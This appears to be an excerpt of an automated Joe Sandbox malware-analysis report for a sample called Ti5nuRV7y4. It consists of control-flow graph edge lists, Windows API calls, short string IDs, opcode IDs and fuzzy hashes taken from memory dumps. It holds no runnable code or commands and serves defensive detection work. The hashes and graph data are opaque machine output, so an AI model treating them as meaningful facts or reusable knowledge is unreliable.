                                                                                                                            control_flow_graph 527 17476f1-1747725 528 1747b54-1747b58 527->528 529 174772b-174774e 527->529 530 1747b71-1747b7f 528->530 531 1747b5a-1747b6e 528->531 538 1747754-1747761 529->538 539 17477fc-1747800 529->539 536 1747bf0-1747c05 530->536 537 1747b81-1747b96 530->537 544 1747c07-1747c0a 536->544 545 1747c0c-1747c19 536->545 546 1747b9d-1747baa 537->546 547 1747b98-1747b9b 537->547 551 1747770 538->551 552 1747763-174776e 538->552 542 1747802-1747810 539->542 543 1747848-1747851 539->543 542->543 563 1747812-174782d 542->563 548 1747c67 543->548 549 1747857-1747861 543->549 553 1747c1b-1747c56 544->553 545->553 554 1747bac-1747bed 546->554 547->554 557 1747c6c-1747c9c 548->557 549->528 555 1747867-1747870 549->555 558 1747772-1747774 551->558 552->558 602 1747c5d-1747c64 553->602 561 1747872-1747877 555->561 562 174787f-174788b 555->562 590 1747cb5-1747cbc 557->590 591 1747c9e-1747cb4 557->591 558->539 565 174777a-17477dc 558->565 561->562 562->557 568 1747891-1747897 562->568 586 174782f-1747839 563->586 587 174783b 563->587 614 17477e2-17477f9 565->614 615 17477de 565->615 570 174789d-17478ad 568->570 571 1747b3e-1747b42 568->571 584 17478c1-17478c3 570->584 585 17478af-17478bf 570->585 571->548 575 1747b48-1747b4e 571->575 575->528 575->555 588 17478c6-17478cc 584->588 585->588 589 174783d-174783f 586->589 587->589 588->571 594 17478d2-17478e1 588->594 589->543 595 1747841 589->595 599 17478e7 594->599 600 174798f-17479ba call 1747538 * 2 594->600 595->543 604 17478ea-17478fb 599->604 618 1747aa4-1747abe 600->618 619 17479c0-17479c4 600->619 604->557 607 1747901-1747913 604->607 607->557 609 1747919-1747931 607->609 672 1747933 call 17480d8 609->672 673 1747933 call 17480c9 609->673 613 1747939-1747949 613->571 617 174794f-1747952 613->617 614->539 615->614 620 1747954-174795a 617->620 621 174795c-174795f 617->621 618->528 641 1747ac4-1747ac8 618->641 619->571 623 17479ca-17479ce 619->623 620->621 624 1747965-1747968 620->624 621->548 621->624 626 17479f6-17479fc 623->626 627 17479d0-17479dd 623->627 628 1747970-1747973 624->628 629 174796a-174796e 624->629 631 1747a37-1747a3d 626->631 632 17479fe-1747a02 626->632 644 17479ec 627->644 645 17479df-17479ea 627->645 628->548 630 1747979-174797d 628->630 629->628 629->630 630->548 633 1747983-1747989 630->633 635 1747a3f-1747a43 631->635 636 1747a49-1747a4f 631->636 632->631 634 1747a04-1747a0d 632->634 633->600 633->604 639 1747a1c-1747a32 634->639 640 1747a0f-1747a14 634->640 635->602 635->636 642 1747a51-1747a55 636->642 643 1747a5b-1747a5d 636->643 639->571 640->639 649 1747b04-1747b08 641->649 650 1747aca-1747ad4 call 17463e0 641->650 642->571 642->643 646 1747a92-1747a94 643->646 647 1747a5f-1747a68 643->647 648 17479ee-17479f0 644->648 645->648 646->571 655 1747a9a-1747aa1 646->655 653 1747a77-1747a8d 647->653 654 1747a6a-1747a6f 647->654 648->571 648->626 649->602 657 1747b0e-1747b12 649->657 650->649 660 1747ad6-1747aeb 650->660 653->571 654->653 657->602 659 1747b18-1747b25 657->659 663 1747b34 659->663 664 1747b27-1747b32 659->664 660->649 669 1747aed-1747b02 660->669 666 1747b36-1747b38 663->666 664->666 666->571 666->602 669->528 669->649 672->613 673->613
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
                                                                                                                            • API String ID: 0-2212926057
                                                                                                                            • Opcode ID: 657d27291b5a12d7ea76e8def37951872b1d298f2fb6198c8036126a015a180f
                                                                                                                            • Instruction ID: ce7329539a79d7586fe23e2e6654d259c88cb4c18e1a7ca0b31799a52f80b0aa
                                                                                                                            • Opcode Fuzzy Hash: 657d27291b5a12d7ea76e8def37951872b1d298f2fb6198c8036126a015a180f
                                                                                                                            • Instruction Fuzzy Hash: 3D125734A002498FDB29CF68D884AAEFBF6FF49314F148599E5099B262D730ED41CB90

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1634 1197924-119792c 1635 119795e-1197996 1634->1635 1636 119792e-1197957 1634->1636 1638 1197998-119799e 1635->1638 1639 11979a1-11979a8 1635->1639 1636->1635 1638->1639 1640 11979aa-11979b0 1639->1640 1641 11979b3-11979eb 1639->1641 1640->1641 1642 11979f3-1197a52 CreateWindowExW 1641->1642 1643 1197a5b-1197a93 1642->1643 1644 1197a54-1197a5a 1642->1644 1648 1197aa0 1643->1648 1649 1197a95-1197a98 1643->1649 1644->1643 1650 1197aa1 1648->1650 1649->1648 1650->1650
                                                                                                                            APIs
                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01197A42
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3696742503.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1190000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateWindow
                                                                                                                            • String ID: 8@u$8@u
                                                                                                                            • API String ID: 716092398-3297297182
                                                                                                                            • Opcode ID: 84e839ade121a634f3db8b1c64712ac002ec88bf5c35f0a9ffc7b060051ad285
                                                                                                                            • Instruction ID: 71f98b205431cc7cb75eebd5421ff0c487b3507de25bb0fa29a45e92896fbfe9
                                                                                                                            • Opcode Fuzzy Hash: 84e839ade121a634f3db8b1c64712ac002ec88bf5c35f0a9ffc7b060051ad285
                                                                                                                            • Instruction Fuzzy Hash: 4551BFB1D103499FDF18CFAAC880ADEBBB5FF48310F64812AE818AB250D7759945CF95

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1651 1194dcc-1197996 1654 1197998-119799e 1651->1654 1655 11979a1-11979a8 1651->1655 1654->1655 1656 11979aa-11979b0 1655->1656 1657 11979b3-1197a52 CreateWindowExW 1655->1657 1656->1657 1659 1197a5b-1197a93 1657->1659 1660 1197a54-1197a5a 1657->1660 1664 1197aa0 1659->1664 1665 1197a95-1197a98 1659->1665 1660->1659 1666 1197aa1 1664->1666 1665->1664 1666->1666
                                                                                                                            APIs
                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01197A42
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3696742503.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1190000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateWindow
                                                                                                                            • String ID: 8@u$8@u
                                                                                                                            • API String ID: 716092398-3297297182
                                                                                                                            • Opcode ID: 560775980b835cb2046566127e023c39bf552796c69abcb2404247612b825fa3
                                                                                                                            • Instruction ID: 6abd0a57a95d62dc156f89fcae7ce1f09a6cbde07a1c785cc6efa47d57e1ded6
                                                                                                                            • Opcode Fuzzy Hash: 560775980b835cb2046566127e023c39bf552796c69abcb2404247612b825fa3
                                                                                                                            • Instruction Fuzzy Hash: 1D51CDB1D103099FDF18CF9AC884ADEBBB5FF48310F64812AE819AB250D775A941CF95
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3696742503.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1190000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule
                                                                                                                            • String ID: 8@u
                                                                                                                            • API String ID: 4139908857-2884537684
                                                                                                                            • Opcode ID: d9d16e017e37f42a94784213aa2937bdf419fca47599046e2608829295a1083a
                                                                                                                            • Instruction ID: b0e184d206885a0accb8552f4304502474362fec0648e4046ec0277a5cfffccb
                                                                                                                            • Opcode Fuzzy Hash: d9d16e017e37f42a94784213aa2937bdf419fca47599046e2608829295a1083a
                                                                                                                            • Instruction Fuzzy Hash: C6815A70A00B458FEB69DF2AD44475ABBF2FF48304F00892ED59ADBA40D735E846CB91
                                                                                                                            APIs
                                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 0119A131
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3696742503.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1190000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallProcWindow
                                                                                                                            • String ID: 8@u
                                                                                                                            • API String ID: 2714655100-2884537684
                                                                                                                            • Opcode ID: 0cf5aa0154040209852d1e594aad2b974c9258cfa93480e1bdc456530d6ef8dc
                                                                                                                            • Instruction ID: 064ebd2648ab43853489d79ec48d67ba66f30bf559119230f898123ae2f7e1ea
                                                                                                                            • Opcode Fuzzy Hash: 0cf5aa0154040209852d1e594aad2b974c9258cfa93480e1bdc456530d6ef8dc
                                                                                                                            • Instruction Fuzzy Hash: 3F4129B5900305CFDB18CF99C848AAABBF5FF88314F25C459D529AB361D734A845CFA1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3696742503.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1190000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 8@u
                                                                                                                            • API String ID: 0-2884537684
                                                                                                                            • Opcode ID: b78d2fad63bbb006066446e671435bab9d21aea84b9a462c14dd67d21d07121f
                                                                                                                            • Instruction ID: ac975b606f909c5339fbf5eb823814854ec0a4051617289afe1f87f6f75a161c
                                                                                                                            • Opcode Fuzzy Hash: b78d2fad63bbb006066446e671435bab9d21aea84b9a462c14dd67d21d07121f
                                                                                                                            • Instruction Fuzzy Hash: 6F31A9B6C007488FDB15DFAAD4047DAFBF4EF8A220F24815AC4A9AB351C334A505CFA1
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0119576C), ref: 011959A6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3696742503.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1190000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule
                                                                                                                            • String ID: 8@u
                                                                                                                            • API String ID: 4139908857-2884537684
                                                                                                                            • Opcode ID: 7b8152cbb0c0835bbfc35794964854cc8d2a4d6b6d49382302227af936079c35
                                                                                                                            • Instruction ID: f0449678e545495387879eaa5144ad4f61440ac7baa4bcacde3f7d251ed5f790
                                                                                                                            • Opcode Fuzzy Hash: 7b8152cbb0c0835bbfc35794964854cc8d2a4d6b6d49382302227af936079c35
                                                                                                                            • Instruction Fuzzy Hash: 5A11F3B5C00649CFEB18CF9AC444B9EFBF5EB89220F10841AD569B7240D375A545CFA5
                                                                                                                            APIs
                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0119C60D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3696742503.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1190000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Initialize
                                                                                                                            • String ID: 8@u
                                                                                                                            • API String ID: 2538663250-2884537684
                                                                                                                            • Opcode ID: 5cdd1247afa163a882835a134562f64119c16680d5e627a8eea63719f0be35a3
                                                                                                                            • Instruction ID: 3bc92f2fbdcb6f8520ce26b630086e8be31a9421d3c5febc2fcec9795aa27b90
                                                                                                                            • Opcode Fuzzy Hash: 5cdd1247afa163a882835a134562f64119c16680d5e627a8eea63719f0be35a3
                                                                                                                            • Instruction Fuzzy Hash: A91145B5800348CFDB24CFAAD444BDEBFF4EB48220F20855AD558A7340C339A644CFA5
                                                                                                                            APIs
                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0119C60D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3696742503.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1190000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Initialize
                                                                                                                            • String ID: 8@u
                                                                                                                            • API String ID: 2538663250-2884537684
                                                                                                                            • Opcode ID: 2818269f70818da26f339197b6a9ef33ad01488045d39c72ba2a2ac7494eeaa7
                                                                                                                            • Instruction ID: 05be5becedace5bae313a2e2b0fc3b95839eed68b685b707e40bd79dc2542443
                                                                                                                            • Opcode Fuzzy Hash: 2818269f70818da26f339197b6a9ef33ad01488045d39c72ba2a2ac7494eeaa7
                                                                                                                            • Instruction Fuzzy Hash: C71115B5900348CFDB24DF9AD445BDEBBF4EB48220F208459E559B7340C379AA44CFA5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Hq$Hq
                                                                                                                            • API String ID: 0-925789375
                                                                                                                            • Opcode ID: a600824de62d4bf56725826981bf5938d27862abb5110e20b107ace5de39fbe6
                                                                                                                            • Instruction ID: a9d4482d1907e5e541e1185fba6324243cb7257e6169b591ece1b6590b96461f
                                                                                                                            • Opcode Fuzzy Hash: a600824de62d4bf56725826981bf5938d27862abb5110e20b107ace5de39fbe6
                                                                                                                            • Instruction Fuzzy Hash: 91919030704215CFEB169F68D854B6EBBF2BFC9344F188469E9068B396DB358C42C791
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ,q$,q
                                                                                                                            • API String ID: 0-1667412543
                                                                                                                            • Opcode ID: 683fdc8fd8a4d731da3afd826acf84a386e716f685706254eafade53d180281c
                                                                                                                            • Instruction ID: 50326f5eea0c82cf4acaf480e8acdbec680cdec07a284a3a89e7e351164f6bc5
                                                                                                                            • Opcode Fuzzy Hash: 683fdc8fd8a4d731da3afd826acf84a386e716f685706254eafade53d180281c
                                                                                                                            • Instruction Fuzzy Hash: 42817074A00505CFDB15DF6DC484969FBB2FF8A710B2481AAE506DB365DB31E841CB92
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Xq$Xq
                                                                                                                            • API String ID: 0-1556399337
                                                                                                                            • Opcode ID: c129b8cffb09f7de84190d169406c4506a051a3e22404e7cc732665c8b162752
                                                                                                                            • Instruction ID: f1228cad02bd30313b2041e8d159c4ee1cbacd709d70009c3b550664f5d0622e
                                                                                                                            • Opcode Fuzzy Hash: c129b8cffb09f7de84190d169406c4506a051a3e22404e7cc732665c8b162752
                                                                                                                            • Instruction Fuzzy Hash: 5331D535B003348BEF29466E889527EE5AAFBC4250F184039D95FC7381DBB5CC858B91
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $q$$q
                                                                                                                            • API String ID: 0-3126353813
                                                                                                                            • Opcode ID: 4d8113689d9c531d48bbd167da10d746c83a3ccfac055899c638d8c7c46f23ca
                                                                                                                            • Instruction ID: 2b4863d0f8680da7e3f3115c643f06237420a5127cf60cbd1141f93f7a4f8bc7
                                                                                                                            • Opcode Fuzzy Hash: 4d8113689d9c531d48bbd167da10d746c83a3ccfac055899c638d8c7c46f23ca
                                                                                                                            • Instruction Fuzzy Hash: 8C3192307042598FDB369BAD989463EFB66FB85350F19489BF206DB293DB24CC408756
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'q$4'q
                                                                                                                            • API String ID: 0-1467158625
                                                                                                                            • Opcode ID: 584d164ed5ddf032b5a85a001e88136a4c0aad663e2df7174bf802a7fc036877
                                                                                                                            • Instruction ID: e1f78a1113ec16f4d1c1571c69ca6cd465d059d231b4e30e928ce4a4feebbf95
                                                                                                                            • Opcode Fuzzy Hash: 584d164ed5ddf032b5a85a001e88136a4c0aad663e2df7174bf802a7fc036877
                                                                                                                            • Instruction Fuzzy Hash: 38F049353002156FDB192AAA985467BFADBEBCC290B148425FB49C7350DE71CC119791
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: LRq
                                                                                                                            • API String ID: 0-3187445251
                                                                                                                            • Opcode ID: 0133230ea3cc9c34e1120df2ff94c25af93357a66e67a5faf059312706f24dae
                                                                                                                            • Instruction ID: d37e6bacddb8dd963015d79067c339581caa08a117cf113dc90ac389e229c906
                                                                                                                            • Opcode Fuzzy Hash: 0133230ea3cc9c34e1120df2ff94c25af93357a66e67a5faf059312706f24dae
                                                                                                                            • Instruction Fuzzy Hash: 0852E478E00219CFCF65DF66E994A9DB7B2FB48301F1085A9D809AB354DB742E81CF91
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: LRq
                                                                                                                            • API String ID: 0-3187445251
                                                                                                                            • Opcode ID: 87c533ce7ca2d3a861dbe197d00ab026da6b1ea79aece007b3fb4d4818e4933a
                                                                                                                            • Instruction ID: 589b0670fdf7cb1e4b5a824fb55bfc0c53bfedd39ae4ac5c2966c3548ee95728
                                                                                                                            • Opcode Fuzzy Hash: 87c533ce7ca2d3a861dbe197d00ab026da6b1ea79aece007b3fb4d4818e4933a
                                                                                                                            • Instruction Fuzzy Hash: F852E378E00219CFCF65DF66E994A9DB7B2FB48301F1085A9E409AB354DB742E81CF91
                                                                                                                            APIs
                                                                                                                            • LdrInitializeThunk.NTDLL(00000000), ref: 06CC9A6E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3711514403.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_6cc0000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: cce7c367916ad1831a7e2e7646eb99d6da83ffdc78934fe5e473675241fa295f
                                                                                                                            • Instruction ID: 5c00c5cae0042067b5e08ac8dbb9e6133b050855aa871ebef8511dca74f4b70a
                                                                                                                            • Opcode Fuzzy Hash: cce7c367916ad1831a7e2e7646eb99d6da83ffdc78934fe5e473675241fa295f
                                                                                                                            • Instruction Fuzzy Hash: 77118E74E002099FEB44CFE9D888AADBBB5FFD8324F148169E844E7345D7309941CB60
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (oq
                                                                                                                            • API String ID: 0-1999159160
                                                                                                                            • Opcode ID: 6004b2d2a4b791fdc109bdaa24065f9118de54510c071ec24198dc16b1e73550
                                                                                                                            • Instruction ID: d9f4d520996afbf43a5edda7efa0606a82e4015279bec8068f145f5430985111
                                                                                                                            • Opcode Fuzzy Hash: 6004b2d2a4b791fdc109bdaa24065f9118de54510c071ec24198dc16b1e73550
                                                                                                                            • Instruction Fuzzy Hash: 3E41B132B042089FDB169B68D854AAEFBB6BFCD250F18446AE516DB391DF319C0187A1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9b9ea969ab3666fb9d3c728180155623b707c07824bbf4315fc61657ee4292e6
                                                                                                                            • Instruction ID: 683862ec1a87ecb12f8599ee4189da9290764197b803549a23aeff211c599be8
                                                                                                                            • Opcode Fuzzy Hash: 9b9ea969ab3666fb9d3c728180155623b707c07824bbf4315fc61657ee4292e6
                                                                                                                            • Instruction Fuzzy Hash: B012BC348A134ACFEA522F20F6BC02EFA61FB5F7A37056D15E11BC84599B350568CF62
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cd2dba3cc52497de85a71f3d48b2e0e25c1f616201b0738eb2ecbd88c753e55c
                                                                                                                            • Instruction ID: 6d113a32ab9e35696ffbbb95b8a5b9ed1227441ab62c5d2e0d2e4722be3b08e0
                                                                                                                            • Opcode Fuzzy Hash: cd2dba3cc52497de85a71f3d48b2e0e25c1f616201b0738eb2ecbd88c753e55c
                                                                                                                            • Instruction Fuzzy Hash: A812AB348A134ACFEA522F20F6AC02EFA61FB5F7A37056D14E11FC84599B7505688F62
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7ddb9a3efe31fd731e5a38bcda8c5d84d6fe0cf98fd417dd3b31fe3997d27d43
                                                                                                                            • Instruction ID: 383eba059ed5ad94391b22262e730720980f91b6724eee535382728efd0ef041
                                                                                                                            • Opcode Fuzzy Hash: 7ddb9a3efe31fd731e5a38bcda8c5d84d6fe0cf98fd417dd3b31fe3997d27d43
                                                                                                                            • Instruction Fuzzy Hash: 5B714A34704609CFDB15DFACC888A6EBBE6BF89640B1504AAE916DB371DB70DC41CB52
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c4feee001c68e045afc6f8a3fe69b461720ee0027327a85f967ed851ba8e120d
                                                                                                                            • Instruction ID: a3c198b644ea13189eac3d82d99d90c5049790833f3c09fa027dc4829be359c4
                                                                                                                            • Opcode Fuzzy Hash: c4feee001c68e045afc6f8a3fe69b461720ee0027327a85f967ed851ba8e120d
                                                                                                                            • Instruction Fuzzy Hash: 8C610374E01318DFDB15DFA9D898B9DBBB2FF89300F608529E805AB294DB355986CF40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5b9f941b9b4e3f1df77b467d68bd7dcbc6ffa694cc3d4bf9f9612e0c8bfe22d8
                                                                                                                            • Instruction ID: bc71bcd1718763b27d0b49532a32517157844ca1dfb585d65866d227e1997418
                                                                                                                            • Opcode Fuzzy Hash: 5b9f941b9b4e3f1df77b467d68bd7dcbc6ffa694cc3d4bf9f9612e0c8bfe22d8
                                                                                                                            • Instruction Fuzzy Hash: 70517574E01218DFDB54DFA9D58499DBBF2FF89300F24816AE819AB365DB30A941CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1ec25b789bc52678958effe809e958da535a14214985596f31d436db6fbdc0df
                                                                                                                            • Instruction ID: 11928379f0de9407b9b2bb6b7bd96cf895cd70dbb3394e97967dbf24d4749268
                                                                                                                            • Opcode Fuzzy Hash: 1ec25b789bc52678958effe809e958da535a14214985596f31d436db6fbdc0df
                                                                                                                            • Instruction Fuzzy Hash: 6351D074E01208DFDB14DFA9D5987EDFBB2EF49300F14816AE815AB254E7385946CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 928906d9dd65b85a048726c6aa451576be67b79ef9a7badaec5a8b537d22c091
                                                                                                                            • Instruction ID: 41870f95ba559e73cb77588f176820b55363d20ef10129018e00c8960f059186
                                                                                                                            • Opcode Fuzzy Hash: 928906d9dd65b85a048726c6aa451576be67b79ef9a7badaec5a8b537d22c091
                                                                                                                            • Instruction Fuzzy Hash: 09517379E01208CFDB08DFAAD59499DBBF6FF89310B208069E815AB364DB35AC41CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
